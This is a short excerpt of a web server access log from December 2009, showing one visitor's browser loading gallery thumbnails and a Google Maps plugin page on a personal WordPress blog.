24.22.69.180 - - [14/Dec/2009:10:02:42 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_043.jpg HTTP/1.1" 200 705590 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:42 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_054.jpg HTTP/1.1" 200 765025 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:42 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_044.jpg HTTP/1.1" 200 780358 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:42 -0800] "GET /blog/wp-content/plugins/xml-google-maps/xmlgooglemaps_show.php?gpxid=4 HTTP/1.1" 200 19182 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:42 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_056.jpg HTTP/1.1" 200 694527 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:42 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_059.jpg HTTP/1.1" 200 796281 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
